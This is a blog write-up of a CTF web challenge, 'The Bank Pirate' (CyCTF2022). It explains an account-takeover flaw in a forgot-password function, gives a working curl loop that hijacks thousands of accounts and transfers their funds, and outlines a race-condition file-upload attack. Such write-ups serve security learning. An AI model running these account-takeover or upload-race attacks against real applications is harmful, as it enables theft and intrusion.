Post

The Bank Pirate - CyCTF2022

Posted Updated
By Mohamed Magdy Abumuslim - أبومسلم 2 min read

Summary :

It’s Banking Application, you can receivce and transfer money with your account, to be able to get ViP access you should have 1.000.000$.

Methodology :

First thing came into my mind that i need to steal some money to get ViP access, The transfer_money function as shown below we have two paramter amount and receiver account but we can’t maipulate the ID to send money from other account to Our account, Because ID is stored in the session. Untitled Most of the web applications us vulnerable to account takeover through Forgot_password Function, So i went to check how this function is working here. 2022-11-21-12-26-12-Window After Analyzing the function i found that we can takeover any account, The function asks you for the username and then gives you that user’s session before make sure you are that user.

So now i will try to takeover User 2 and transfer money to my account. 2022-11-18-12-54-42-SB-Admin-2-Forgot-Password-Mozilla-Firefox Successfully I tookover the account and transfered money to my account. 2022-11-18-12-55-12-Mozilla-Firefox Now i need to autmate this proccess to get 1 million dollar, Basically the script takeover the accounts sequentially and transfer money to my account.

1
2
3
4
5
6
7
8
9
10

for i in $(seq 7 6000); do
 curl -i -s -k  -X $'GET' \
    -H $'Host: 3.248.33.115:40017' -H $'Cache-Control: max-age=0' -H $'Upgrade-Insecure-Requests: 1' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.101 Safari/537.36' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' -H $'Cookie: PHPSESSID=htr5dtksu0fp2i5121sfblfnod' -H $'Connection: close' \
    -b $'PHPSESSID=htr5dtksu0fp2i5121sfblfnod' \
    $'http://3.248.33.115:40017/forgot-password.php?username='$i
 curl -i -s -k  -X $'GET' \
    -H $'Host: 3.248.33.115:40017' -H $'Upgrade-Insecure-Requests: 1' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.101 Safari/537.36' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' -H $'Cookie: PHPSESSID=htr5dtksu0fp2i5121sfblfnod' -H $'Connection: close' \
    -b $'PHPSESSID=htr5dtksu0fp2i5121sfblfnod' \
    $'http://3.248.33.115:40017/transfere.php?receiver_account=6015&amount=1000' 
done

After Waiting some time, Now i have ViP account. 2022-11-18-16-16-30-The-Pirate-Bank-Dashboard-Mozilla-Firefox Now we can upload a file with a complaint becase we are ViP and you need to listen. Alec

Let’s analyze how the complaint function works and see how we can abuse the upload function. upload We can only upload PNG,JPEG and the location for the uploaded file will be randomly generated by syper_random function O.o, Let’s see how random is that. 2022-11-21-12-38-48-Window Yeah, It’s super random. giphy-29

2022-11-18-16-19-00-b6589fc6ab0dc82cf12099d1c2d40ab994e8410c-png-PNG-Image-900-876-pixels-Moz

The Last part of the challenge is similar to that challenge RACE-CONDITION As you see it’s the same steps to be vulnerable ^_^. RACE-Condition After we upload a file it’s temporary moved to the disk, So we can use Race condition to execute the file we upload on the disk to get the flag.

CTF
CTF
This post is licensed under CC BY 4.0 by the author.